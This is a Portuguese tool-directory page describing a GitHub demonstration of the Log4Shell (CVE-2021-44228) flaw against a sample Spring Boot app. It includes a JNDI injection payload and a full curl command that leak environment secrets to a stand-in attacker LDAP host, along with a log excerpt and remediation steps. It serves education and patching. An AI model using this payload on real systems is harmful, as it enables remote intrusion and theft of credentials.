Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
log4j-vulnerability — Log4Shell (CVE-2021-44228) é uma vulnerabilidade de dia zero no Log4j | Kitploit
Ferramentas/GitHubGitHub/mazhar-hassan/log4j-vulnerability
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubmazhar-hassan/log4j-vulnerability

log4j-vulnerability

Log4Shell (CVE-2021-44228) é uma vulnerabilidade de dia zero no Log4j

Ver Repositório
há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Log4Shell (CVE-2021-44228) é uma vulnerabilidade zero-day no Log4j

Vulnerabilidade do Log4J

Descoberta: 24 de novembro de 2021

Corrigida: 6 de dezembro de 2021

Demonstração do Ataque

Clique abaixo para o vídeo do YouTube

ATTACK DEMO

Aplicação de exemplo

Esta aplicação de exemplo é uma aplicação Spring Boot, que usa log4j como framework de logging e executa com as seguintes variáveis de ambiente na porta 8080 em localhost

Confira a explicação em vídeo:

https://youtu.be/bb6pgWrm7tA

Variáveis de ambiente

key=jason.bourne;secret=Treadstone

Ataque

POST http://localhost:8080//v1/public/log-test

Parâmetro:

value=${jndi:ldap://some-random-hacking-site.com}

Ataque do cliente

Obter variáveis de ambiente

Usando a string a seguir, você pode obter variáveis de ambiente value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}

Comando curl

curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'

Console de Log

2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect] at com.sun.jndi.ldap.Connection.<init>(Connection.java:243) at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)

Correção

https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot

Confirmação

mvn dependency:tree Certifique-se de que nenhum dos jars dependentes aponte para a versão vulnerável do log4j.

Lista de reprodução de segurança do Techflix no YouTube

https://www.youtube.com/watch?v=bb6pgWrm7tA&list=PLLqjNYIgOqeQl6NaeIeUhvNcWdpOVNkRi&index=1

Baixar ferramenta